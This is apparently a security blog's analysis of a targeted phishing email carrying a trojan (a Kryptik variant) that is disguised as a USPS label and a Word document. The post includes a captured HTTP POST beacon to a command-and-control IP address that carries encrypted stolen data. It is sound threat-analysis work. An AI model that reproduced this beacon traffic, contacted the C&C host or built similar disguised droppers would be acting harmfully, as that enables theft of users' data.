Screenshot of original email |
What makes this malware interesting is that it is clearly targeted, in that the malware sender knows the city of the email recipient. In this case, the malware was named USPS_Label_Hagerstown.zip.
Analysis of the email headers shows that the email originated from mail16.chariot.com.au. Checking this server, it is not and open relay, so it's possible the mail server itself, or a system within the mail server's local network, was compromised.
Analysis of email headers |
Inside the zip file, another file named USPS_Label_Hagerstown.exe - with an icon for a Microsoft Word document.
Virus Total shows a very low detection rate, some of which are only heuristic detections.
The file itself installs a trojan on the user's system. This trojan produces some interesting results when analyzed in a sandbox.
In short, the trojan looks at your web browsing history, then begins sending encrypted HTTP POST requests to a command & control server.
The C&C server itself appears to be a compromised web host, most likely unknown to the server's owner.POST /460326245047F2B6E405E92260B09AA0E35D7CA2B1 HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0 Host: 88.255.149.11 Content-Length: 308 Cache-Control: no-cache \x80\x00\x00\x00Sy\xb2\xeat\xe0/\xd8\xfa6k:K\xf1\x9f\xaa&x\xaa\xd3\x7f\xaer\x96C\xf2N\xf0\xf6\xf7\x94\xd2T\xa7\xcd\xc7\xe13n\x92p}\x83\x04\x01\x00j\xee+\xef\x036\x1a\x90t\x87\xabO\xd6\x81N4 \x85>\xfcD\xddob\x90\x8f\x00\xe6\x1c\xde\xf55\xf0\xc3\x8e3 |\x88\xf0\xb9\x0f\x95m@$\x14\xe0\x84\xd80\xe1[\x1c\xf1\xd7\xa6\xdb\x9c\x19\x00w!\xb2\x11\x9cz\x8eh(\xf7\x939\x18\xdb\x83\xcb\xfe\x14Rm\x83\xac\x00\x00\x00\xa3"\xfa\xecO*\xd8\x93\xdf\x9b%w\xef\xc5\xd4\xa9{\x92\xfd\xfa\x13\x0c\x95\xe4\xc2k\x9a\xb6a\x99\x94\xae\x02VjJA\xb1\xebf\xf5f\x83\xd7\xb5bs\xa1?%\x12\x15\xd4 i\xbcMp\xf3 =\xfaT\xff\xd0a'\x9a\xbb\x07\x91\xb4\xffb\x1f>hR\x9d\x84Q\xe3\xa1~\xb5\xcd\xea$\xc9\xa0\xd1\\xd1,!\xc0\x97|$Qg\xfe\xa1E,\xfe@\xba\x97\x01\x98\xb9\xdd\xea\xbd\xf7;\x94\x87T3\x90\xc5juG\xc3\x93\xc8\x98\x19\xf7\xff@\xce\x11\x1f\x82\x96\xff\xa5\xc1\xfdW9"R\xce\x81t\x0e\xf7o\x96_\x92>\x0c\xf3Dp\xc5\xc7c \xb4r\xaa\2\xba)
According to ESET, the malware is a variant of the Kryptik family, which steals information and sensitive files from a system. This variant, Win32/Kryptik.CBJZ, has only been seen in the wild since 05/8/2014, and has an extremely low infection rate.
For those interested, I have posted a decompiled and disassembled version of the malware at my malware analysis lab.
Many thanks to David Malekar for sending me a sample of this malware to analyze.
If anyone has additional malware samples similar to this one, with a targeted location in the filename, please feel free to contact me at CaffSecBlog AT gmail.com, and I'll be happy to take a look at it.
No comments:
Post a Comment